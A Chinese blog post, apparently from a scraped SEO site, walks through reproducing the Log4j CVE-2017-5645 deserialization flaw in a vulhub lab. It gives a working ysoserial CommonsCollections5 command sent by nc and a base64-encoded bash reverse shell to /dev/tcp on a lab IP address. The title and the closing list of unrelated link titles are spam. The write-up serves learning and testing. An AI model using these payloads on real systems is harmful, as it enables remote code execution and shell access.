当前位置: 首页 > news >正文

王也动漫windows优化大师怎么样

王也动漫,windows优化大师怎么样,大理 网站建设,网站 head关键字 密度 多少字感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 1.5、深度利用1、反弹Shell 说明内容漏洞编号CVE-2017-5645漏洞名称Log4j Server …

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞扫描
        • 3、漏洞验证
      • 1.5、深度利用
        • 1、反弹Shell

说明内容
漏洞编号CVE-2017-5645
漏洞名称Log4j Server 反序列化命令执行漏洞
漏洞评级高危
影响范围Apache Log4j 2.8.2之前的2.x版本
漏洞描述
修复方案

1.1、漏洞描述

攻击者可以通过发送一个特别制作的2进制payload,在组件将字节反序列化为对象时,触发并执行构造的payload代码。该漏洞主要是由于在处理ObjectInputStream时,接收函数对于不可靠来源的input没有过滤。可以通过给TcpSocketServer和UdpSocketServer添加可配置的过滤功能以及一些相关设置,可以有效的解决该漏洞。

1.2、漏洞等级

漏洞危害评分:7.5,攻击者可利用该漏洞执行任意代码。

1.3、影响版本

Apache Log4j 2.8.2之前的2.x版本

1.4、漏洞复现

1、基础环境

kali环境IP地址:192.168.8.8

Path:vulhub/log4j/CVE-2017-5645


启动测试环境:

sudo docker-compose up -d
2、漏洞扫描
3、漏洞验证

扫描目标开启的端口

在这里插入图片描述

ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链中,然后将这些对象序列化为stdout。当类路径上具有所需小工具的应用程序不安全地反序列化该数据时,将自动调用该链并导致在应用程序主机上执行该命令。

ysoserial项目地址:

https://github.com/frohoff/ysoserial

下载打包好的jar文件到我们的kali主机上

在这里插入图片描述
进行利用,先创建一个文件,来进行测试

java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/saury" | nc 192.168.8.8 4712

在这里插入图片描述

1.5、深度利用

1、反弹Shell
bash -i >& /dev/tcp/192.168.8.8/6868 0>&1

将反弹shell进行base64编码

在这里插入图片描述

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguOC82ODY4IDA+JjE=

shell反弹

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguOC82ODY4IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.8.8 4712

在这里插入图片描述

在这里插入图片描述

http://www.khdw.cn/news/28280.html

相关文章:

  • 模型评测网站怎么做百度站长工具查询
  • 昌平网站建设网址域名注册信息查询
  • 测试页面网站建设vi设计
  • 杭州企业网站制作公司直播:韩国vs加纳直播
  • 网站页脚优化怎么做seo描述是什么
  • 网站建设金牛万达seo公司发展前景
  • 然后做服装网站如何做网址
  • 浙江火电建设有限公司网站北京百度推广投诉电话
  • 做网站选择虚拟主机好是服务器关键词排名客服
  • 推广链接打开谷歌aso优化
  • 网站用哪些系统做的比较好用seo优化分析
  • 建设一个网站需要关键词规划师工具
  • 长沙建个网站一般需要多少钱嘉兴seo外包服务商
  • 网站怎么赚钱的培训加盟
  • 仿08影院wordpress优化公司排名
  • 《学做网站论坛》视频下载百度推广服务费3000元
  • 镇江seo网站怎么把网站排名排上去
  • 男女做暖暖的网站大全杭州做网站的公司排行
  • 专升本需要考些什么科目宁波seo网站排名优化公司
  • 电子商务网站开发意义青岛网络优化厂家
  • 成都百度推广公司联系方式公司网站如何seo
  • 模仿京东商城网站开发视频seo网站推广教程
  • dedecms 食品网站模板应用商店优化
  • 网站建设的背景有哪些关键词搜索神器
  • WordPress增强文本css类郑州seo全网营销
  • 手机网站建设价钱是多少武汉百度推广入口
  • 自适应网站教程重庆seo外包平台
  • 上海专业的网站建百度权重划分等级
  • 牛b插网站建设广州seo网站开发
  • 站酷网站百度在西安的公司叫什么